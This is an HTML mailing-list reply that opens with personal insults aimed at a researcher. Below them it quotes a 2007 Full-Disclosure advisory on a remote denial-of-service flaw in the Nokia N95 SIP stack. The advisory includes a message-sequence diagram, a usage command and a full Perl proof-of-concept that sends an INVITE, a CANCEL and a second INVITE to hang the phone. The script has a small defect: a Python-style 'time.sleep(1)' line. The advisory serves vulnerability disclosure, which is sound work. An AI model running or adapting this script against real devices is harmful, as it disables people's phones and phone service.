So almighty Phd what is your thesis exactly?<br><br>To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions'<br><br>does this properly summarize your phd credentials?<br>
<br>I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of'<br><br>I am sure you will serve the academic community great one day when teach "hacking" classes revolving around the latest editions of hacking exposed
<br><br><br><br><div class="gmail_quote">On Dec 5, 2007 11:05 AM, Radu State <<a href="mailto:State@loria.fr">State@loria.fr</a>> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div link="blue" vlink="purple" lang="FR">
<div>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Nokia N95
cellphone remote DoS using the SIP Stack</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Severity:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">High </span></font><font face="Tahoma" size="2"><span style="font-size: 10pt; font-family: Tahoma;" lang="EN-GB">–</span></font><font face="Courier New" size="2">
<span style="font-size: 10pt;" lang="EN-GB"> Denial of Service</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Hardware:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Nokia N95</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Firmware:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Tested version:
Nokia RM-159 V 12.0.013</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Notification:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Vulnerability
found: 11 September 2007</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Contact Nokia
Support: 12 September 2007 / None reply Contact Nokia Security Support: 19
September 2007 / None reply</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Vulnerability
Synopsis:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">If the device has
the SIP Phone client activated, a sequence of SIP messages turn the device in
an inconsistent state where the user is not able to operate it anymore until it
reboots.</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">The sequence of
messages consists in 2 different SIP Dialogs where the first initiates an
INVITE transaction but immediately closes it (in an anticipated manner). While,
the second transaction initiates a normal INVITE transaction that trigger the
vulnerability of the target.</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">The sequence of
messages is illustrated below.</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">X
------------------------- INVITE -----------------------> Nokiav12</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">X
<---------------------- 100 Trying ---------------------- Nokiav12 </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">X
------------------------- CANCEL -----------------------> Nokiav12 </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">X
<----------------- OK (to the Cancel) ------------------- Nokiav12</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> X
<---------------- 487 Request Terminated ---------------- Nokiav12</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">--------New
Dialog--------</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">X
------------------------- INVITE -----------------------> Nokiav12</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">X
<---------------------- 100 Trying ---------------------- Nokiav12</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">X
<---------------------- 180 Trying ---------------------- Nokiav12</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">---- The device
does not work properly anymore ----</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Impact:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">A remote entity
can take down all the services of the cell phone</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Resolution:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">As we did not get
any proper reply from Nokia about the subject, the best way will be to disable
the SIP Client</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Credits:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Humberto J. Abdelnur
(Ph.D Student)</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Radu</span></font><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> State</span></font><font face="Courier New" size="2">
<span style="font-size: 10pt;" lang="EN-GB"> (Ph.D)</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Olivier Festor
(Ph.D)</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">This
vulnerability was identified by the Madynes research team at INRIA Lorraine,
using KiF the Madynes VoIP fuzzer.</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;"><a href="http://madynes.loria.fr/" target="_blank"><span lang="EN-GB">http://madynes.loria.fr/</span></a></span></font><font face="Courier New" size="2">
<span style="font-size: 10pt;" lang="EN-GB"></span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Proof of Concept:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">A perl script
(nokiav12.pl) is attached to this mail. Before launching </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">it, the SIP phone
has to be initialed in the target device</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Command:</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">perl nokiav12.pl
<dst_IP> <username> <SourceIp> <SourceUsername></span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Eg. perl
nokiav12.pl <a href="http://192.168.1.119" target="_blank">192.168.1.119</a> lupilu <a href="http://192.168.1.2" target="_blank">192.168.1.2</a> tucu</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">#!/usr/bin/perl</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">##################################################</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># Vulnerabily
discovered using KiF ~ Kiph #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># Authors: #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># Humberto J.
Abdelnur (Ph.D Student) #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># Radu State
(Ph.D) #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># Olivier Festor
(Ph.D) #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># Madynes Team,
LORIA - INRIA Lorraine
#</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"># </span></font><font face="Courier New" size="2"><span style="font-size: 10pt;"><a href="http://madynes.loria.fr/" target="_blank">
<span lang="EN-GB">http://madynes.loria.fr</span></a></span></font><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> #</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">##################################################</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">use
IO::Socket::INET;</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">use
String::Random;</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">die "Usage
$0 <targetIP> <targetUser> <attackerIP>
<attackerUser>" </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">unless ($ARGV[3]);</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">$targetUser = $ARGV[1];</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">$targetIP = $ARGV[0];</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$attackerUser =
$ARGV[3];</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$attackerIP=
$ARGV[2];</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$socket=new
IO::Socket::INET->new(</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Proto=>'udp',</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">PeerPort=>5060,</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">PeerAddr=>$targetIP,</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">LocalPort=>5060);</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$foo = new
String::Random;</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$callid=
$foo->randpattern("CCccnCn");</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$cseq =
$foo->randregex('\d\d\d\d');</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">$sdp =
"v=0\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">o=Lupilu
63356722367567875 63356722367567875 IN IP4 $attackerIP\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">s=-\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">c=IN IP4
$attackerIP\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">t=0 0\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">m=audio 49152 RTP/AVP
96 0 8 97 18 98 13\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=sendrecv\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=ptime:20\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=maxptime:200\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">a=fmtp:96
mode-change-neighbor=1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=fmtp:18
annexb=no\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=fmtp:98 0-15\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=rtpmap:96
AMR/8000/1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=rtpmap:0
PCMU/8000/1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=rtpmap:8
PCMA/8000/1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">a=rtpmap:97
iLBC/8000/1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">a=rtpmap:18
G729/8000/1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">a=rtpmap:98
telephone-event/8000/1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">a=rtpmap:13
CN/8000/1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">";</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$sdplen= length
$sdp;</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">$msg =
"INVITE sip:$targetUser\@$targetIP SIP/2.0\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Via: SIP/2.0/UDP
$attackerIP;branch=z9hG4bK1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">From:
<sip:$attackerUser\@$attackerIP>;tag=1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">To:
<sip:$targetUser\@$targetIP>\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Call-ID:
$callid\@$attackerIP\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">CSeq: $cseq
INVITE\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">Max-Forwards:
70\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Contact:
<sip:$attackerUser\@$attackerIP>\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Allow: INVITE,
ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">MESSAGE\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">Content-Type: application/sdp\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Content-Length:
$sdplen\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$sdp";</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$socket->send($msg);</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$text = '';</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">while (not $text
=~ /^SIP\/2.0 100(.\r\n)*/ ){</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$socket->recv($text,1024,0);</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">}</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$msg =
"CANCEL sip:$targetUser\@$targetIP SIP/2.0\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Via: SIP/2.0/UDP
$attackerIP;branch=z9hG4bK1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">From:
<sip:$attackerUser\@$attackerIP>;tag=1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">To:
<sip:$targetUser\@$targetIP>;tag=1\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Call-ID:
$callid\@$attackerIP\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">CSeq: $cseq
CANCEL\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Max-Forwards:
70\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Content-Length:
0\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">";</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$socket->send($msg);</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">time.sleep(1);</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">$callid=
$foo->randpattern("CCccnCn");</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">$cseq =
$foo->randregex('\d\d\d\d');</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">$msg = "INVITE
sip:$targetUser\@$targetIP SIP/2.0\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">Via: SIP/2.0/UDP
$attackerIP;branch=z9hG4bK2\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">From:
<sip:$attackerUser\@$attackerIP>;tag=2\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">To:
<sip:$targetUser\@$targetIP>\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Call-ID:
$callid\@$attackerIP\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">CSeq: $cseq
INVITE\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="PT-BR">Contact:
<sip:$attackerUser\@$attackerIP>\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Max-Forwards:
70\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Allow: INVITE,
ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">MESSAGE\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;">Content-Type:
application/sdp\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">Content-Length:
$sdplen\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">\r</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$sdp";</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB">$socket->send($msg);</span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;" lang="EN-GB"> </span></font></p>
<p style=""><font face="Courier New" size="2"><span style="font-size: 10pt;"> </span></font></p>
<p><font face="Arial" size="2"><span style="font-size: 10pt; font-family: Arial;"> </span></font></p>
</div>
</div>
<br>
<p><font size="2">No virus found in this outgoing message.<br>
Checked by AVG Free Edition.<br>
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007 19:31<br>
</font> </p>
<br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>